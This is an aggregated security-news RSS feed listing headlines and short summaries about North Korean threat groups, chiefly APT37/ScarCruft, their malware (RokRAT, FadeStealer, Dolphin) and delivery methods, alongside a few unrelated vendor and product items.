www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. It's a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr. 2024-05-10T05:20:04+00:00 www.secnews.physaphae.fr

ProofPoint - Cyber Firms: From Social Engineering to DMARC Abuse: TA427's Art of Information Gathering 2024-04-16T06:00:54+00:00 https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering www.secnews.physaphae.fr/article.php?IdArticle=8483299 False Malware,Tool,Threat,Conference APT 43,APT 37 2.0000000000000000

Recorded Future - Recorded Future feed: News media, foreign affairs experts are targets of North Korean group's latest campaign. North Korean state hackers are targeting media organizations and high-profile academics in a new espionage campaign, according to a new report released this week. The goal of these attacks, attributed by researchers at SentinelLabs to a hacker group known as ScarCruft or APT37, is to “gather strategic intelligence” that can “contribute to North Korea's decision-making 2024-01-24T14:00:00+00:00 https://therecord.media/scarcruft-apt37-north-korea-espionage-south-korea-media-academia www.secnews.physaphae.fr/article.php?IdArticle=8442554 False None APT 37 3.0000000000000000
Dark Reading - Informationweek Branch: North Korea's ScarCruft Attackers Gear Up to Target Cybersecurity Pros. Based on fresh infection routines the APT is testing, it's looking to harvest threat intelligence in order to improve operational security and stealth. 2024-01-22T20:30:00+00:00 https://www.darkreading.com/threat-intelligence/north-koreasc-arcruft-attackers-target-cybersecurity-pros www.secnews.physaphae.fr/article.php?IdArticle=8441819 False Threat APT 37 3.0000000000000000

Global Security Mag - French news site: A glimpse into future ScarCruft campaigns - Attackers gather strategic intelligence and target cybersecurity professionals. In collaboration with NK News, SentinelLabs has been tracking campaigns targeting experts in North Korean affairs from South Korea's academic sector and a news organisation focused on North Korea. SentinelLabs has observed persistent targeting of the same individuals over a span of two months. - Malware Update 2024-01-22T14:45:41+00:00 https://www.globalsecuritymag.fr/a-glimpse-into-future-scarcruft-campaigns-attackers-gather-strategic.html www.secnews.physaphae.fr/article.php?IdArticle=8441691 False None APT 37 3.0000000000000000
SentinelOne (APT) - Cyber Firms: ScarCruft | Attackers Gather Strategic Intelligence and Target Cybersecurity Professionals. New ScarCruft activity suggests the adversary is planning to target cybersecurity professionals and businesses. 2024-01-22T13:55:47+00:00 https://www.sentinelone.com/labs/a-glimpse-into-future-scarcruft-campaigns-attackers-gather-strategic-intelligence-and-target-cybersecurity-professionals/ www.secnews.physaphae.fr/article.php?IdArticle=8441698 False None APT 37 3.0000000000000000

Wired Threat Level - Security News: 6 Theragun Cyber Monday Deals (2023): Percussive Massage Devices. Whether you have sore muscles, tired eyes, or dull skin, there's a Therabody massager on sale that could help. 2023-11-27T13:17:33+00:00 https://www.wired.com/story/therabody-theragun-cyber-monday-deals-2023/ www.secnews.physaphae.fr/article.php?IdArticle=8417208 False None APT 37 1.00000000000000000000

AhnLab - Korean Security Firm: 2023 Aug – Threat Trend Report on APT Groups. August 2023 Major Issues on APT Groups 1) Andariel 2) APT29 3) APT31 4) Bitter 5) Bronze Starlight 6) Callisto 7) Carderbee 8) Charcoal Typhoon (RedHotel) 9) Earth Estries 10) Flax Typhoon 11) GroundPeony 12) Infamous Chisel 13) Kimsuky 14) Lazarus 15) MoustachedBouncher 16) Mysterious Elephant (APT-K-47) 17) Nobelium (Midnight Blizzard) 18) Red Eyes (APT37) Aug_Threat Trend Report on APT Groups 2023-10-23T02:22:16+00:00 https://asec.ahnlab.com/en/57930/ www.secnews.physaphae.fr/article.php?IdArticle=8399124 False Threat,Prediction APT 38,APT 38,APT 29,APT 37,APT 31 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, right?): Lazarus Group Targeting Defense Experts with Fake Interviews via Trojanized VNC Apps. The North Korea-linked Lazarus Group (aka Hidden Cobra or TEMP.Hermit) has been observed using trojanized versions of Virtual Network Computing (VNC) apps as lures to target the defense industry and nuclear engineers as part of a long-running campaign known as Operation Dream Job. "The threat actor tricks job seekers on social media into opening malicious apps for fake job interviews," Kaspersky 2023-10-18T20:21:00+00:00 https://thehackernews.com/2023/10/lazarus-group-targeting-defense-experts.html www.secnews.physaphae.fr/article.php?IdArticle=8397305 False Threat APT 38,APT 38,APT 37 2.0000000000000000

AhnLab - Korean Security Firm: Threat Trend Report on APT Groups – July 2023. July 2023 Major Issues on APT Groups 1) APT28 2) APT29 3) APT31 4) Camouflaged Hunter 5) Charming Kitten 6) Gamaredon 7) Kimsuky 8) Konni 9) Lazarus 10) Mustang Panda 11) Patchwork 12) Red Eyes 13) Space Pirates 14) Turla 15) Unclassified ATIP_2023_Jul_Threat Trend Report on APT Groups 2023-09-11T05:02:48+00:00 https://asec.ahnlab.com/en/56971/ www.secnews.physaphae.fr/article.php?IdArticle=8381128 False Threat,Prediction APT 38,APT 35,APT 35,APT 29,APT 29,APT 37,APT 37,APT 31,APT 28,APT 28 2.0000000000000000
AhnLab - Korean Security Firm: RedEyes (ScarCruft)'s CHM Malware Using the Topic of Fukushima Wastewater Release. The AhnLab Security Emergency response Center (ASEC) analysis team has recently discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The CHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email from a Korean Financial Company”[1] covered in March of this year and also uses the same commands used in the “2.3. Persistence”[2] stage in the attack process of the RedEyes... 2023-09-08T00:55:10+00:00 https://asec.ahnlab.com/en/56857/ www.secnews.physaphae.fr/article.php?IdArticle=8380255 False Malware,Threat APT 37 2.0000000000000000
AhnLab - Korean Security Firm: Distribution of Backdoor via Malicious LNK: RedEyes (ScarCruft). AhnLab Security Emergency response Center (ASEC) has confirmed that malware [1], which was previously distributed in CHM format, is now being distributed in LNK format. This malware executes additional scripts located at a specific URL through the mshta process. It then receives commands from the threat actor's server to carry out additional malicious behaviors. The threat actor has been distributing the confirmed LNK file on a regular website by uploading it alongside malware within a compressed file. The malicious LNK... 2023-09-06T01:29:24+00:00 https://asec.ahnlab.com/en/56756/ www.secnews.physaphae.fr/article.php?IdArticle=8379404 False Malware,Threat APT 37 3.0000000000000000
AhnLab - Korean Security Firm: Threat Trend Report on APT Groups – June 2023. APT Group Trends – June 2023 1) Andariel 2) APT28 3) Cadet Blizzard (DEV-0586) 4) Camaro Dragon 5) Charming Kitten (Mint Sandstorm) 6) Gamaredon (Shuckworm) 7) Ke3chang (APT15, Nickel) 8) Kimsuky 9) Lazarus 10) Muddy Water 11) Mustang Panda 12) OceanLotus 13) Patchwork (White Elephant) 14) Red Eyes (APT37) 15) Sharp Panda 16) SideCopy 17) Stealth Soldier ATIP_2023_Jun_Threat Trend Report on APT Groups 2023-08-16T06:46:45+00:00 https://asec.ahnlab.com/en/56195/ www.secnews.physaphae.fr/article.php?IdArticle=8370575 False Threat,Prediction APT 38,APT 35,APT 35,APT 25,APT 32,APT 32,APT 37,APT 37,APT 15,APT 15,APT 28,APT 28 2.0000000000000000
AhnLab - Korean Security Firm: Threat Trend Report on APT Groups – May 2023. The cases of major APT groups for May 2023 gathered from materials made public by security companies and institutions are as follows. – Agrius – Andariel – APT28 – APT29 – APT-C-36 (Blind Eagle) – Camaro Dragon – CloudWizard – Earth Longzhi (APT41) – GoldenJackal – Kimsuky – Lazarus – Lancefly – OilAlpha – Red Eyes (APT37, ScarCruft) – SideCopy – SideWinder – Transparent Tribe (APT36) – Volt Typhoon (Bronze Silhouette) ATIP_2023_May_Threat Trend Report on APT Groups_20230609 2023-07-07T02:33:29+00:00 https://asec.ahnlab.com/en/55184/ www.secnews.physaphae.fr/article.php?IdArticle=8353225 False Threat,Prediction APT 38,GoldenJackal,GoldenJackal,APT-C-36,APT 29,APT 29,APT 37,APT 37,Guam,Guam,APT 28,APT 28,APT 41,APT 36,APT 36,APT-C-17,APT-C-17 3.0000000000000000
Global Security Mag - French news site: FadeStealer: new eavesdropping malware from the North Korean hacker group APT37 - Malwares 2023-06-23T13:09:19+00:00 https://www.globalsecuritymag.fr/FadeStealer-un-nouveau-logiciel-malveillant-d-ecoute-du-groupe-de-pirates-nord.html www.secnews.physaphae.fr/article.php?IdArticle=8348513 False None APT 37 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?): ScarCruft Hackers Exploit Ably Service for Stealthy Wiretapping Attacks. The North Korean threat actor known as ScarCruft has been observed using an information-stealing malware with previously undocumented wiretapping features as well as a backdoor developed using Golang that exploits the Ably real-time messaging service. "The threat actor sent their commands through the Golang backdoor that is using the Ably service," the AhnLab Security Emergency response Center ( 2023-06-21T21:46:00+00:00 https://thehackernews.com/2023/06/scarcruft-hackers-exploit-ably-service.html www.secnews.physaphae.fr/article.php?IdArticle=8347758 False Malware,Threat APT 37 2.0000000000000000

Bleeping Computer - American magazine: APT37 hackers deploy new FadeStealer eavesdropping malware. The North Korean APT37 hacking group uses a new 'FadeStealer' information-stealing malware containing a 'wiretapping' feature, allowing the threat actor to snoop and record from victims' microphones. [...] 2023-06-21T16:16:11+00:00 https://www.bleepingcomputer.com/news/security/apt37-hackers-deploy-new-fadestealer-eavesdropping-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8347834 False Malware,Threat APT 37,APT 37 2.0000000000000000

AhnLab - Korean Security Firm: RedEyes Group Wiretapping Individuals (APT37). 1. Overview RedEyes (also known as APT37, ScarCruft, and Reaper) is a state-sponsored APT group that mainly carries out attacks against individuals such as North Korean defectors, human rights activists, and university professors. Their task is known to be monitoring the lives of specific individuals. In May 2023, AhnLab Security Emergency response Center (ASEC) discovered the RedEyes group distributing and using an Infostealer with wiretapping features that was previously unknown along with a backdoor developed using GoLang that exploits the... 2023-06-21T02:00:00+00:00 https://asec.ahnlab.com/en/54349/ www.secnews.physaphae.fr/article.php?IdArticle=8347574 False None APT 37 2.0000000000000000
knowbe4 - cybersecurity services: CyberheistNews Vol 13 #24 [The Mind's Bias] Pretexting Now Tops Phishing in Social Engineering Attacks. CyberheistNews Vol 13 #24 | June 13th, 2023 [The Mind's Bias] Pretexting Now Tops Phishing in Social Engineering Attacks The New Verizon DBIR is a treasure trove of data. As we will cover a bit below, Verizon reported that 74% of data breaches involve the "Human Element," so people are one of the most common factors contributing to successful data breaches. Let's drill down a bit more in the social engineering section. They explained: "Now, who has received an email or a direct message on social media from a friend or family member who desperately needs money? Probably fewer of you. This is social engineering (pretexting specifically) and it takes more skill. "The most convincing social engineers can get into your head and convince you that someone you love is in danger. They use information they have learned about you and your loved ones to trick you into believing the message is truly from someone you know, and they use this invented scenario to play on your emotions and create a sense of urgency. The DBIR Figure 35 shows that Pretexting is now more prevalent than Phishing in Social Engineering incidents. However, when we look at confirmed breaches, Phishing is still on top." A social attack known as BEC, or business email compromise, can be quite intricate. In this type of attack, the perpetrator uses existing email communications and information to deceive the recipient into carrying out a seemingly ordinary task, like changing a vendor's bank account details. But what makes this attack dangerous is that the new bank account provided belongs to the attacker. As a result, any payments the recipient makes to that account will simply disappear. BEC Attacks Have Nearly Doubled It can be difficult to spot these attacks as the attackers do a lot of preparation beforehand. They may create a domain doppelganger that looks almost identical to the real one and modify the signature block to show their own number instead of the legitimate vendor's. Attackers can make many subtle changes to trick their targets, especially if they are receiving many similar legitimate requests. This could be one reason why BEC attacks have nearly doubled across the entire DBIR incident dataset, as shown in Figure 36, and now make up over 50% of incidents in this category. Financially Motivated External Attackers Double Down on Social Engineering Timely detection and response is crucial when dealing with social engineering attacks, as well as most other attacks. Figure 38 shows a steady increase in the median cost of BECs since 2018, now averaging around $50,000, emphasizing the significance of quick detection. However, unlike the times we live in, this section isn't all doom and 2023-06-13T13:00:00+00:00 https://blog.knowbe4.com/cyberheistnews-vol-13-24-the-minds-bias-pretexting-now-tops-phishing-in-social-engineering-attacks www.secnews.physaphae.fr/article.php?IdArticle=8344804 False Spam,Malware,Vulnerability,Threat,Patching ChatGPT,ChatGPT,APT 43,APT 37,Uber 2.0000000000000000

Data Security Breach - French news site: Kimsuky, the malicious code made in North Korea 2023-06-05T16:17:19+00:00 https://www.datasecuritybreach.fr/kimsuky-thallium-ta406/ www.secnews.physaphae.fr/article.php?IdArticle=8342214 False None APT 43,APT 37 2.0000000000000000

InfoSecurity Mag - InfoSecurity Magazine: US and Korean Agencies Issue Warning on North Korean Cyber-Attacks. The advisory identifies several actors: Kimsuky, Thallium, APT43, Velvet Chollima and Black Banshee 2023-06-02T16:00:00+00:00 https://www.infosecurity-magazine.com/news/us-korean-agencies-issue-warning/ www.secnews.physaphae.fr/article.php?IdArticle=8341524 False None APT 43,APT 43,APT 37 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?): N. Korean ScarCruft Hackers Exploit LNK Files to Spread RokRAT. Cybersecurity researchers have offered a closer look at the RokRAT remote access trojan that's employed by the North Korean state-sponsored actor known as ScarCruft. "RokRAT is a sophisticated remote access trojan (RAT) that has been observed as a critical component within the attack chain, enabling the threat actors to gain unauthorized access, exfiltrate sensitive information, and potentially 2023-06-01T12:28:00+00:00 https://thehackernews.com/2023/06/n-korean-scarcruft-hackers-exploit.html www.secnews.physaphae.fr/article.php?IdArticle=8341141 False Threat APT 37 2.0000000000000000

Anomali - Firm Blog: Anomali Cyber Watch: Custom Virtual Environment Hides FluHorse, BabyShark Evolved into ReconShark, Fleckpe-Infected Apps Add Expensive Subscriptions. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Deconstructing Amadey's Latest Multi-Stage Attack and Malware Distribution (published: May 5, 2023) McAfee researchers have detected a multi-stage attack that starts with a trojanized wextract.exe, a Windows executable used to extract files from a cabinet (CAB) file. It was used to deliver the AgentTesla, Amadey botnet, LockBit ransomware, Redline Stealer, and other malicious binaries. To avoid detection, the attackers use obfuscation and disable Windows Defender through the registry, thus stopping users from turning it back on through the Defender settings.
Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioral analysis defenses and social engineering training. Users should report suspicious files with double extensions such as .EXE.MUI. Indicators associated with this campaign are available in the Anomali platform and users are advised to block these on their infrastructure. MITRE ATT&CK: [MITRE ATT&CK] T1562.001: Disable or Modify Tools | [MITRE ATT&CK] T1555 - Credentials From Password Stores | [MITRE ATT&CK] T1486: Data Encrypted for Impact | [MITRE ATT&CK] T1027 - Obfuscated Files Or Information Tags: malware:Amadey, malware-type:Botnet, malware:RedLine, malware:AgentTesla, malware-type:Infostealer, malware:LockBit, malware-type:Ransomware, abused:Wextract.exe, file-type:CAB, file-type:EXE, file-type:MUI, target-program:Windows Defender, target-system:Windows Eastern Asian Android Assault – FluHorse (published: May 4, 2023) Active since May 2022, a newly-detected Android stealer dubbed FluHorse spreads mimicking popular apps or as a fake dating application. According to Check Point researchers, FluHorse was targeting East Asia (Taiwan and Vietnam) while remaining undetected for months. This stealthiness is achieved by sticking to minimal functions while also relying on a custom virtual machine that comes with the Flutter user interface software development kit. FluHorse is being distributed via emails that prompt the recipient to install the app and, once installed, it asks for the user's credit card or banking data. If second-factor authentication is needed to commit banking fraud, FluHorse tells the user to wait for 10-15 minutes while intercepting codes by installing a listener for all incoming SMS messages. Analyst Comment: FluHorse's ability to remain undetected for months makes it a dangerous threat. Users should avoid installing applications following download links received via email or other messaging. Verify the app authenticity on the official com 2023-05-09T20:02:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-custom-virtual-environment-hides-fluhorse-babyshark-evolved-into-reconshark-fleckpe-infected-apps-add-expensive-subscriptions www.secnews.physaphae.fr/article.php?IdArticle=8334939 False Malware,Tool,Threat APT 43,APT 37 3.0000000000000000

AhnLab - Korean Security Firm: AhnLab EDR Tracks and Responds against Link File (*.lnk) Distributing RokRAT. AhnLab Security Emergency response Center (ASEC) has shared information regarding the RedEyes threat group (also known as APT37, ScarCruft), who distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month. The LNK file contains a PowerShell command and performs malicious behavior without the knowledge of the individual who uses the normal pdf file by creating and executing script files along with normal files in the temp path. If a malicious LNK file is injected into a... 2023-05-07T23:30:00+00:00 https://asec.ahnlab.com/en/52172/ www.secnews.physaphae.fr/article.php?IdArticle=8334177 False Malware,Threat APT 37 2.0000000000000000
Dark Reading - Informationweek Branch: North Korean APT Gets Around Macro-Blocking With LNK Switch-Up. APT37 is among a growing list of threat actors that have switched to Windows shortcut files after Microsoft blocked macros last year. 2023-05-02T16:47:00+00:00 https://www.darkreading.com/attacks-breaches/north-korean-apt-gets-around-macro-blocking-with-lnk-switch-up www.secnews.physaphae.fr/article.php?IdArticle=8332893 False Threat APT 37 2.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?): North Korea's ScarCruft Deploys RokRAT Malware via LNK File Infection Chains. The North Korean threat actor known as ScarCruft began experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default. "RokRAT has not changed significantly over the years, but its deployment methods have evolved, now utilizing archives containing LNK files that initiate 2023-05-02T12:24:00+00:00 https://thehackernews.com/2023/05/north-koreas-scarcruft-deploys-rokrat.html www.secnews.physaphae.fr/article.php?IdArticle=8332732 False Malware,Threat APT 37 2.0000000000000000

Anomali - Firm Blog: Anomali Cyber Watch: APT37 Adopts LNK Files, Charming Kitten Uses BellaCiao Implant-Dropper, ViperSoftX Infostealer Unique Byte Remapping Encryption. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Chain Reaction: RokRAT's Missing Link (published: May 1, 2023) Since 2022, the North Korea-sponsored group APT37 (Group123, Ricochet Chollima) has largely switched its delivery methods from maldocs to hiding payloads inside oversized LNK files. Check Point researchers identified several infection chains used by the group from July 2022 to April 2023. These were used to deliver one of APT37's custom tools (GoldBackdoor and RokRAT), or the commodity malware Amadey. All the lures studied appear to target Korean-speaking individuals with topics related to South Korea. Analyst Comment: The switch to LNK-based infection chains lets APT37 require less user interaction, since the chain can be triggered by a simple double-click. The group continues to use the well-tested RokRAT, which remains a stealthy tool with its additional layers of encryption, cloud C2 and in-memory execution. Indicators associated with this campaign are available in the Anomali platform and customers are advised to block these on their infrastructure. MITRE ATT&CK: [MITRE ATT&CK] T1059.001: PowerShell | [MITRE ATT&CK] T1055 - Process Injection | [MITRE ATT&CK] T1027 - Obfuscated Files or Information | [MITRE ATT&CK] T1105 - Ingress Tool Transfer | [MITRE ATT&CK] T1204.002 - User Execution: Malicious File | [MITRE ATT&CK] T1059.005 - Command and Scripting Interpreter: Visual Basic | [MITRE ATT&CK] T1140 - Deobfuscate/Decode Files or Information | [MITRE ATT&CK] T1218.011 - Signed Binary Proxy Execution: Rundll32 Tags: malware:RokRAT, mitre-software-id:S0240, malware-type:RAT, actor:Group123, mitre-group:APT37, actor:Ricochet Chollima, source-country:North Korea, source-country:KP, target-country:South Korea, target-country:KR, file-type:ZIP, file-type:DOC, file-type:ISO, file-type:LNK, file-type:BAT, file-type:EXE, file-type:VBS, malware:Amadey, malware:GoldBackdoor, malware-type:Backdoor, abused:pCloud, abused:Yandex Cloud, abused:OneDrive, abused:Hangul Word Processor, abused:Themida, target-system:Windows 2023-05-01T23:16:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apt37-adopts-lnk-files-charming-kitten-uses-bellaciao-implant-dropper-vipersoftx-infostealer-unique-byte-remapping-encryption www.secnews.physaphae.fr/article.php?IdArticle=8332656 False Ransomware,Malware,Tool,Vulnerability,Threat,Prediction,Cloud APT 35,APT 37,APT 37 2.0000000000000000

Checkpoint Research - Security hardware manufacturer: Chain Reaction: ROKRAT's Missing Link. Key findings Introduction From the many reports on APT37 in recent months, to Mandiant's announcement on APT43, a lot of attention is currently focused on North Korean threat actors – and with good reason. North Korea has a long history of attacking its southern neighbor, especially by means of cyber warfare which continues today. In this […] 2023-05-01T11:32:18+00:00 https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/ www.secnews.physaphae.fr/article.php?IdArticle=8332629 False Threat APT 43,APT 37 2.0000000000000000
Dark Reading: Lazarus, ScarCruft North Korean APTs Shift Tactics, Thrive
As threat actors around the world grow and evolve, APTs from the DPRK stand out for their spread and variety of targets.
Published 2023-04-27T19:50:44+00:00. https://www.darkreading.com/endpoint/lazarus-scarcruft-north-korean-apts-shift-tactics-thrive

AhnLab: RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)
AhnLab Security Emergency response Center (ASEC) confirmed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM malware disguised as a security email from a Korean financial company last month, has also recently distributed the RokRAT malware through LNK files. RokRAT is malware capable of collecting user credentials and downloading additional malware. The malware was previously distributed through HWP and Word files. The LNK files discovered this time contain PowerShell commands that can perform malicious...
Published 2023-04-25T23:30:00+00:00. https://asec.ahnlab.com/en/51751/
Global Security Mag: An unintended leak by cybercriminals: the attack vectors of APT37 (Special reports / APT 37)
Even cybercriminals store data on GitHub and forget to delete it completely. The Zscaler ThreatLabz team was able to take a closer look at the tools, techniques and procedures (TTPs) of APT37 (also known as ScarCruft or Temp.Reaper), an advanced persistent threat actor originating from North Korea.
Published 2023-04-24T07:00:00+00:00. https://www.globalsecuritymag.fr/Ein-unbeabsichtigtes-Leck-bei-Cyberkriminellen-Die-Angriffsvektoren-von-APT37.html
Anomali Cyber Watch: Account takeover, APT, Banking trojans, China, Cyberespionage, India, Malspam, North Korea, Phishing, Skimmers, Ukraine, and Vulnerabilities
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Phishing Campaign Targets Chinese Nuclear Energy Industry (published: March 24, 2023)
Active since 2013, the Bitter group (T-APT-17) is suspected of being sponsored by the Indian government. Intezer researchers discovered a new Bitter campaign targeting academics, government, and other organizations in the nuclear energy industry in China. The techniques are consistent with previously observed Bitter campaigns. The intrusion begins with a phishing email purporting to come from a real employee of the Embassy of Kyrgyzstan. The malicious attachments observed were either Microsoft Compiled HTML Help (CHM) files or Microsoft Excel files with Equation Editor exploits. The goal of the payloads is to establish persistence via scheduled tasks and download further malware payloads (previous Bitter campaigns used a browser credential stealer, file stealer, keylogger, and remote access tool plugins). The attackers relied on LZX compression and string concatenation for detection evasion.
Analyst Comment: Many advanced attacks start with basic techniques such as unsolicited emails with an attachment that requires the user to open it. It is important to teach basic online hygiene and phishing awareness to your users. It is safe to recommend never opening attached CHM files and keeping your MS Office suite fully updated. All known indicators associated with this Bitter campaign are available in the Anomali platform and customers are advised to block them on their infrastructure.
MITRE ATT&CK: T1589.002 - Gather Victim Identity Information: Email Addresses | T1566.001 - Phishing: Spearphishing Attachment | […]
Published 2023-03-28T21:28:00+00:00. https://www.anomali.com/blog/anomali-cyber-watch-account-takeover-apt-banking-trojans-china-cyberespionage-india-malspam-north-korea-phishing-skimmers-ukraine-and-vulnerabilities

Dark Reading: North Korea's Kimsuky Evolves into Full-Fledged, Prolific APT
In cyberattacks against the US, South Korea, and Japan, the group (aka APT43 or Thallium) is using advanced social engineering and cryptomining tactics that set it apart from other threat actors.
Published 2023-03-28T17:05:00+00:00. https://www.darkreading.com/threat-intelligence/north-korea-kimsuky-evolves-full-fledged-persistent-threat

The Hacker News: ScarCruft's Evolving Arsenal: Researchers Reveal New Malware Distribution Techniques
The North Korean advanced persistent threat (APT) actor dubbed ScarCruft is using weaponized Microsoft Compiled HTML Help (CHM) files to download additional malware. According to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the findings are illustrative of the group's continuous efforts to refine and retool its tactics to sidestep detection. […]
Published 2023-03-22T17:54:00+00:00. https://thehackernews.com/2023/03/scarcrufts-evolving-arsenal-researchers.html

AhnLab: CHM Malware Disguised as Security Email from a Korean Financial Company: RedEyes (ScarCruft)
The ASEC (AhnLab Security Emergency response Center) analysis team has discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), is being distributed to Korean users. The team has confirmed that the command used in the "2.3. Persistence" stage of the RedEyes group's M2RAT malware attack, which was reported back in February, has the same format as the command used in this attack. This information, as well as...
Published 2023-03-08T23:30:00+00:00. https://asec.ahnlab.com/en/49089/

AhnLab: HWP Malware Using the Steganography Technique: RedEyes (ScarCruft)
In January, the ASEC (AhnLab Security Emergency response Center) analysis team discovered that the RedEyes threat group (also known as APT37, ScarCruft) had been distributing malware by exploiting the HWP EPS (Encapsulated PostScript) vulnerability (CVE-2017-8291). This report will share the RedEyes group's latest activity in Korea. 1. Overview: The RedEyes group is known for targeting specific individuals rather than corporations, stealing not only personal PC information but also the mobile phone data of their targets. A distinct characteristic of the...
Published 2023-02-21T01:00:00+00:00. https://asec.ahnlab.com/en/48063/

The Hacker News: North Korea's APT37 Targeting Southern Counterpart with New M2RAT Malware
Published 2023-02-15T20:29:00+00:00. https://thehackernews.com/2023/02/north-koreas-apt37-targeting-southern.html

Information Security Buzz: RedEyes Hackers Adopt New Malware, Steal Data From Devices
Published 2023-02-15T10:06:57+00:00. https://informationsecuritybuzz.com/redeyes-hackers-malware-data-devices/

Bleeping Computer: RedEyes hackers use new malware to steal data from Windows, phones
Published 2023-02-14T17:37:57+00:00. https://www.bleepingcomputer.com/news/security/redeyes-hackers-use-new-malware-to-steal-data-from-windows-phones/

The Hacker News:
Google Warns of Internet Explorer Zero-Day Vulnerability Exploited by ScarCruft Hackers
Published 2022-12-08T13:29:00+00:00. https://thehackernews.com/2022/12/google-warns-of-internet-explorer-zero.html

Netskope: Cloud Threats Memo: Cyber Espionage Exploiting Google Drive for C2 Infrastructure
Another day, another legitimate cloud service exploited for a cyber espionage campaign… Researchers at ESET recently discovered Dolphin, a previously unreported backdoor used by the North Korean threat actor APT37 (aka ScarCruft and Reaper) against selected targets. The backdoor, deployed after the initial compromise using less sophisticated malware, was observed for the first time in early […]
Published 2022-12-06T19:07:40+00:00. https://www.netskope.com/blog/cloud-threats-memo-cyber-espionage-exploiting-google-drive-for-c2-infrastructure

We Live Security (ESET): ScarCruft updates its toolset – Week in security with Tony Anscombe
Deployed against carefully selected targets, the new backdoor combs through the drives of compromised systems for files of interest before exfiltrating them to Google Drive.
Published 2022-12-02T14:00:43+00:00. https://www.welivesecurity.com/videos/scarcruft-updates-its-toolset-week-in-security-with-tony-anscombe/

Security Affairs: North Korea ScarCruft APT used previously undetected Dolphin Backdoor against South Korea
The North Korea-linked ScarCruft group used a previously undocumented backdoor called Dolphin against targets in South Korea. ESET researchers discovered a previously undocumented backdoor called Dolphin that was employed by the North Korea-linked ScarCruft group (aka APT37, Reaper, and Group123) in attacks aimed at targets in South Korea. ScarCruft has been active since at least 2012; it made the headlines in early February 2018 when researchers […]
Published 2022-12-01T11:02:51+00:00. https://securityaffairs.co/wordpress/139148/hacking/north-korea-scarcruft-dolphin-backdoor.html

The Hacker News: North Korea Hackers Using New "Dolphin" Backdoor to Spy on South Korean Targets
Published 2022-12-01T00:00:00+00:00. https://thehackernews.com/2022/12/north-korea-hackers-using-new-dolphin.html

Data Security Breach: A North Korea-linked hacker group steals valuable files by relying on Google Drive
Published 2022-11-30T14:15:11+00:00. https://www.datasecuritybreach.fr/dolphin-google-drive-hack/

Global Security Mag: ESET Research: a North Korea-linked hacker group steals valuable files by relying on Google Drive (Malware)
Published 2022-11-30T13:59:28+00:00. https://www.globalsecuritymag.fr/ESET-Research-un-groupe-de-pirates-lie-a-la-Coree-du-Nord-vole-des-fichiers-de.html

We Live Security (ESET): Who's swimming in South Korean waters?
Meet ScarCruft's Dolphin
Published 2022-11-30T10:30:33+00:00. https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/

Global Security Mag: Hermitage Solutions signs a distribution agreement with JumpCloud (Business)
Published 2022-11-21T04:41:00+00:00. https://www.globalsecuritymag.fr/Hermitage-Solutions-signe-un-accord-de-distribution-avec-JumpCloud.html

Global Security Mag: 24 Nov 2022, 12:00-13:00, ACCEDIAN and Hermitage Solutions webinar: Why use an NDR solution to cover the blind spots of your customers' EDR and firewalls? (Events)
Published 2022-11-18T23:30:00+00:00. https://www.globalsecuritymag.fr/24-nov-2022-12-00-13-00-Webinaire-ACCEDIAN-et-Hermitages-Solutions-Pourquoi.html

Global Security Mag: Hermitage Solutions adds Accedian's network detection and response (NDR) solution to its catalogue (Business)
Published 2022-11-17T17:40:11+00:00. https://www.globalsecuritymag.fr/Hermitage-Solutions-integre-la-solution-de-detection-et-de-reponse-reseau-NDR-d.html

Cisco Talos: The benefits of taking an intent-based approach to detecting Business Email Compromise
By Abhishek Singh.
Key points:
- BEC is a multi-stage attack. Adversaries first identify targets, then establish rapport with the victim before exploiting them for whatever their end goal is. In the case of BEC, a threat actor can impersonate any employee in the organization to trick targets.
- A policy that checks for authorized email addresses of the sender can prevent BEC attacks. However, scaling the approach to every employee in a large organization is a challenge.
- Building an executive profile based on email analysis using a machine learning model and scanning emails against that profile will detect BEC. Data collection for building and training machine learning algorithms can take time, though, opening a window of opportunity for threat actors to exploit.
- Detection of exploitation techniques such as lookalike domains and any differences between the email addresses in the "From" and "Reply-To" fields can also detect BEC messages. However, the final verdict cannot account for the threat actor's intent.
- The intent-based approach detects BEC and then classifies it into the type of scam. It catches BEC messages irrespective of whether a threat actor is impersonating a C-level executive or any other employee in an organization. Classification based on the type of scam can help identify which segment of an organization was targeted and which employees were being impersonated by the threat actor. The additional information will further assist in designing better preventive features to stop BEC.
